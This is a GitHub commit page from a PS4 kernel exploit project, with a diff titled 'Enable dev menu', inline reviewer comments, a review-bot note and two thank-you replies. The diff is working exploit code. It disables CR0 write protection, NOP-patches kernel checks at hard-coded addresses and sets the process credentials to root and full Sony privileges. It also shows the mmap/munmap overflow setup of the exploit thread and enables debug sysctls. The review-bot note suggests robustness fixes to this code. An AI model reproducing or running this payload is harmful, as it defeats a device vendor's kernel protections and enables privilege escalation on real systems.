
Enable dev menu

Thanks, flatz :)
CTurt committed Apr 27, 2016
1 parent c8f27db commit 0028afaf0ef9b2581d47ec4d32ebb4c75db9d576
Showing with 22 additions and 9 deletions.
  1. +22 −9 source/main.c
@@ -32,12 +32,17 @@ void payload(struct knote *kn) {
// Disable write protection
uint64_t cr0 = readCr0();
writeCr0(cr0 & ~X86_CR0_WP);
// Patch functions here if required
// sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
*(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;


@balika011

balika011 May 1, 2016

It's just a bypass for word_FFFFFFFF833242F6 & 4 in FFFFFFFF826073B0

*(uint16_t *)0xFFFFFFFF82607826 = 0x9090;


@balika011

balika011 May 1, 2016

It's just a bypass for word_FFFFFFFF833242F6 & 0x10 in FFFFFFFF826077D0

*(char *)0xFFFFFFFF8332431A = 1;


@balika011

balika011 May 1, 2016

bIsAllowDebugSoftWagnerClock

*(char *)0xFFFFFFFF83324338 = 1;


@balika011

balika011 May 1, 2016

bIsAllowAdClock, bIsStoreMode, also used in FFFFFFFF826077D0

// Restore write protection
writeCr0(cr0);
// Resolve creds
cred = td->td_proc->p_ucred;
@@ -48,7 +53,7 @@ void payload(struct knote *kn) {
cred->cr_groups[0] = 0;
void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
// sceSblACMgrIsSystemUcred
uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
*sonyCred = 0xffffffffffffffff;
@@ -101,11 +106,8 @@ void *exploitThread(void *none) {
uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
// Ensure end of mapping is unmapped
munmap(mapping + mappingSize, PAGE_SIZE);
// buffer + copySize points to unmapped memory
uint8_t *buffer = mapping + mappingSize - copySize;
int64_t count = (0x100000000 + bufferSize) / 4;
@@ -246,7 +248,18 @@ int _main(void) {
printfsocket("[+] Kernel patch success!\n");
// Do any post-exploit stuff here
// Enable debug menu
int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
RESOLVE(libKernelHandle, sysctlbyname);
uint32_t enable;
size_t size;
enable = 1;
size = sizeof(enable);
sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);
#ifdef DEBUG_SOCKET
munmap(dump, PAGE_SIZE);
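Review bot: In the last hunk `sysctlbyname` is initialised to NULL and the outcome of `RESOLVE(libKernelHandle, sysctlbyname)` is never checked, so if the lookup fails the next line calls through a null function pointer immediately after "[+] Kernel patch success!" has been printed; both `sysctlbyname(...)` calls also discard their return value, so a rejected write to either sysctl goes unreported. Guard the pointer and report failures through the channel the surrounding code already uses, e.g. `if (!sysctlbyname || sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size) != 0) printfsocket("[-] Failed to enable debug menu\n");`, and the same for the store-mode call. The four lines `uint32_t enable; size_t size; enable = 1; size = sizeof(enable);` read more naturally as `uint32_t enable = 1; size_t size = sizeof enable;`, initialising at the declaration. The enclosing `_main` starts and ends outside the hunk.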

2 comments on commit 0028afa

@chronoss09


chronoss09 replied Apr 28, 2016

Good work, thanks ;)

@Anonymodmous


Anonymodmous replied Jul 31, 2016

Very good work
